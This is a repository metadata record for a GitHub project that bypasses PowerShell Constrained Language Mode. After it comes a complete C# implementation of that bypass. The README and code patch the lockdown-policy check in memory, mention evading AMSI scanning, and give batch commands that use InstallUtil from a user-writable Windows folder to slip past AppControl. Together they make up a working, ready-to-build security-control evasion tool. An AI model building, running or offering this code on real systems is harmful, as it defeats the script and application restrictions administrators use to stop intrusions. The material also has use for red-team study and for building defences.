{"id":13841114,"url":"https://github.com/calebstewart/bypass-clm","last_synced_at":"2025-04-13T06:37:04.539Z","repository":{"id":41416364,"uuid":"334040278","full_name":"calebstewart/bypass-clm","owner":"calebstewart","description":"PowerShell Constrained Language Mode Bypass","archived":false,"fork":false,"pushed_at":"2021-01-31T19:13:55.000Z","size":12,"stargazers_count":259,"open_issues_count":1,"forks_count":37,"subscribers_count":7,"default_branch":"master","last_synced_at":"2025-03-26T23:06:14.211Z","etag":null,"topics":["bypass","powershell","windows"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/calebstewart.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-01-29T04:46:23.000Z","updated_at":"2025-03-14T15:37:15.000Z","dependencies_parsed_at":"2022-09-19T13:40:39.823Z","dependency_job_id":null,"html_url":"https://github.com/calebstewart/bypass-clm","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fbypass-clm","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fbypass-clm/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fbypass-clm/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fbypass-clm/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/calebstewart","download_url":"https://codeload.github.com/calebstewart/bypass-clm/tar.gz/refs/heads/master","host":{"name":"GitHub",
"url":"https://github.com","kind":"github","repositories_count":248675334,"owners_count":21143763,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","powershell","windows"],"created_at":"2024-08-04T17:01:02.858Z","updated_at":"2025-04-13T06:37:04.519Z","avatar_url":"https://github.com/calebstewart.png","language":"C#","funding_links":[],"categories":["C# #"],"sub_categories":[],"readme":"# PowerShell Constrained Language Mode Bypass\n\nThis project builds an executable that runs a Full Language Mode PowerShell session even when Constrained Language Mode is enabled. At the time of writing, the only bypass methods I have found are downgrading to PowerShell version 2 or using Runspaces from .NET. PowerShell version 2 is not commonly available now, and Runspaces do not natively provide an interactive interface. This method provides a full PowerShell session just like running `powershell.exe`, but one that will *always* be in Full Language Mode.\n\nThis is accomplished by doing the following:\n\n1. We reflectively load the internal `SystemPolicy` class within `System.Management.Automation`.\n2. We ensure the static method `GetSystemLockdownPolicy` has been compiled by the JIT engine.\n3. We retrieve a function pointer for the compiled method.\n4. We utilize `VirtualProtect` to ensure the function code is writable.\n5. We overwrite the method with the stub `xor rax,rax; ret`. This effectively forces `GetSystemLockdownPolicy` to return `SystemEnforcementMode.None`, which is the enum's zero value. The stub is x64-only, since it zeroes the 64-bit `rax` register.\n6. We utilize the `Microsoft.PowerShell.ConsoleShell` class (from `Microsoft.PowerShell.ConsoleHost`) to load an interactive PowerShell session within this process.\n\nWe also implement a method similar to the `rasta-mouse` AMSI Bypass to ensure the new shell is not scanned by AMSI.\n\nIt's worth noting that this will not spawn `powershell.exe`. The PowerShell prompt and interpreter are run from memory in the current process.\n\n## Executing a FLM Shell under AppControl\n\nIf `AppControl` is enabled, you can use the well-known `InstallUtil` method. This project supports being loaded by `InstallUtil`. Simply place the binary in a directory the policy allows (`C:\\Windows\\Tasks\\` is a common choice: it is writable by standard users yet typically covered by the default allow rule for `C:\\Windows`) and run the following:\n\n```batch\nREM find `InstallUtil`\ndir \\Windows\\Microsoft.NET\\* /s/b | findstr InstallUtil.exe$\nREM Run the FLM powershell session (/U makes InstallUtil call the assembly's Installer.Uninstall override)\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U \"C:\\Windows\\Tasks\\bypass-clm.exe\"\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcalebstewart%2Fbypass-clm","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcalebstewart%2Fbypass-clm","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcalebstewart%2Fbypass-clm/lists"}
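The six-step patch in the README and the `InstallUtil` entry point it relies on, written out as an added C# example. This is not the bypass-clm project's own source: it assumes .NET Framework 4.x on x64 with references to `System.Management.Automation`, `Microsoft.PowerShell.ConsoleHost` and `System.Configuration.Install`; the names `ClmPatch`, `Loader` and `Program`, the banner text, and the explicit x64 check are my own choices, and the AMSI patch the README mentions is left out.

```csharp
// Added example, not the project's code. Implements the README's steps 1-6 and the
// Installer.Uninstall hook that InstallUtil /U invokes. Assumes .NET Framework 4.x, x64,
// with references to System.Management.Automation, Microsoft.PowerShell.ConsoleHost
// and System.Configuration.Install.
using System;
using System.Collections;
using System.ComponentModel;
using System.Configuration.Install;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using Microsoft.PowerShell;

public static class ClmPatch
{
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize,
                                              uint flNewProtect, out uint lpflOldProtect);

    private const uint PAGE_EXECUTE_READWRITE = 0x40;

    // Steps 1-5: make SystemPolicy.GetSystemLockdownPolicy() return
    // SystemEnforcementMode.None (enum value 0) for the rest of this process.
    public static void DisableLockdownPolicy()
    {
        // The stub below zeroes rax, so it is only meaningful on x64.
        if (IntPtr.Size != 8)
            throw new PlatformNotSupportedException("xor rax,rax stub is x64-only");

        // Step 1: the internal class lives in the already-loaded System.Management.Automation.
        Assembly sma = typeof(PowerShell).Assembly;
        Type systemPolicy = sma.GetType("System.Management.Automation.Security.SystemPolicy", true);
        MethodInfo getPolicy = systemPolicy.GetMethod("GetSystemLockdownPolicy",
            BindingFlags.Static | BindingFlags.NonPublic | BindingFlags.Public,
            null, Type.EmptyTypes, null);
        if (getPolicy == null)
            throw new MissingMethodException("SystemPolicy.GetSystemLockdownPolicy not found");

        // Step 2: force JIT compilation so the handle refers to native code, not a pre-stub.
        RuntimeHelpers.PrepareMethod(getPolicy.MethodHandle);

        // Step 3: native entry point of the compiled method.
        IntPtr entry = getPolicy.MethodHandle.GetFunctionPointer();

        // Step 5's payload: xor rax,rax (48 31 C0) ; ret (C3)
        byte[] stub = { 0x48, 0x31, 0xC0, 0xC3 };

        // Step 4: JIT'd code is mapped RX; make the page writable first.
        uint oldProtect;
        if (!VirtualProtect(entry, (UIntPtr)stub.Length, PAGE_EXECUTE_READWRITE, out oldProtect))
            throw new Win32Exception(Marshal.GetLastWin32Error());

        // Step 5: overwrite the method prologue, then put the original protection back.
        Marshal.Copy(stub, 0, entry, stub.Length);
        uint ignored;
        VirtualProtect(entry, (UIntPtr)stub.Length, oldProtect, out ignored);
    }

    // Step 6: host the interactive console inside this process; no powershell.exe is spawned.
    public static int RunShell(string[] args)
    {
        DisableLockdownPolicy();
        // ConsoleShell.Start is the same host entry point powershell.exe uses.
        // RunspaceConfiguration.Create() is marked obsolete but still ships with Windows PowerShell 5.1.
        return ConsoleShell.Start(RunspaceConfiguration.Create(), "FLM shell (added example)", "", args);
    }
}

// InstallUtil /U loads the assembly and calls Uninstall on every class marked RunInstaller(true),
// which is how the README's batch command reaches the patch without executing the EXE directly.
[RunInstaller(true)]
public class Loader : Installer
{
    public override void Uninstall(IDictionary savedState)
    {
        ClmPatch.RunShell(new string[0]);
    }
}

public static class Program
{
    // Direct execution path (the README's "just like running powershell.exe").
    public static int Main(string[] args)
    {
        return ClmPatch.RunShell(args);
    }
}
```

Because the patch lives in the JIT'd code of this process only, a fresh `powershell.exe` started from the resulting shell is unaffected and will again honour the lockdown policy; that is the check to make when confirming the bypass did not leak beyond the process.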